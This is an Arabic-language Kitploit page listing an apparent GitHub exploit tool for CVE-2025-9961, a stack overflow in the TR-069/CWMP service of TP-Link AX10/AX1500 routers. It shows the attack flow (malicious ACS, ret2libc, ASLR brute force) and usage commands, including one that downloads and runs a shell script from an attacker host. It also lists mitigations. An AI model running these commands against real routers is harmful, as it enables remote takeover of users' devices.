Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9961 | Kitploit
أدوات/GitHubGitHub/yt2w/cve-2025-9961
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الأجهزةأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubyt2w/cve-2025-9961

CVE-2025-9961

عرض المستودع
61منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-9961

ثغرة تجاوز سعة المخزن المؤقت في CWMP لأجهزة TP-Link AX10/AX1500 وتنفيذ تعليمات برمجية عن بُعد

نظرة عامة

تجاوز سعة المخزن المؤقت المستند إلى المكدس في CWMP (TR-069) مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

الحقلالقيمة
المنتجTP-Link AX10, AX1500
الإصدارات المتأثرةAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (عالٍ)
النوعتجاوز سعة المخزن المؤقت في المكدس
ناقل الهجومCWMP/TR-069 (المنفذ 7547)
التأثيرتنفيذ تعليمات برمجية عن بُعد

تدفق الهجوم

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

التفاصيل الفنية

تقع الثغرة في معالجة عملية cwmp لطلبات SOAP من نوع SetParameterValues. يُستخدم الإدخال لحساب حجم المخزن المؤقت دون التحقق من الحدود.

الاستغلال:

  • استخدم أسلوب ret2libc لاستدعاء system()
  • تجاوز ASLR عبر القوة العمياء
  • إعادة تشغيل الخدمة تسمح بتكرار المحاولات

الاستخدام

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

المعلمات

المتطلبات

لا شيء (يستخدم المكتبة القياسية)

التخفيف

  • حدّث البرنامج الثابت إلى الإصدار المُصحَّح
  • عطّل TR-069/CWMP
  • قيّد الوصول إلى المنفذ 7547

إخلاء المسؤولية

للاستخدام في اختبارات الأمان المصرح بها فقط.

تنزيل الأداة
العلامةالوصفالافتراضي
-p, --portمنفذ CWMP7547
-c, --commandالأمر لتنفيذ RCEnone
-t, --timeoutمهلة المقبس10
--dosوضع DoS فقطoff
--check-onlyالتحقق من قابلية التأثرoff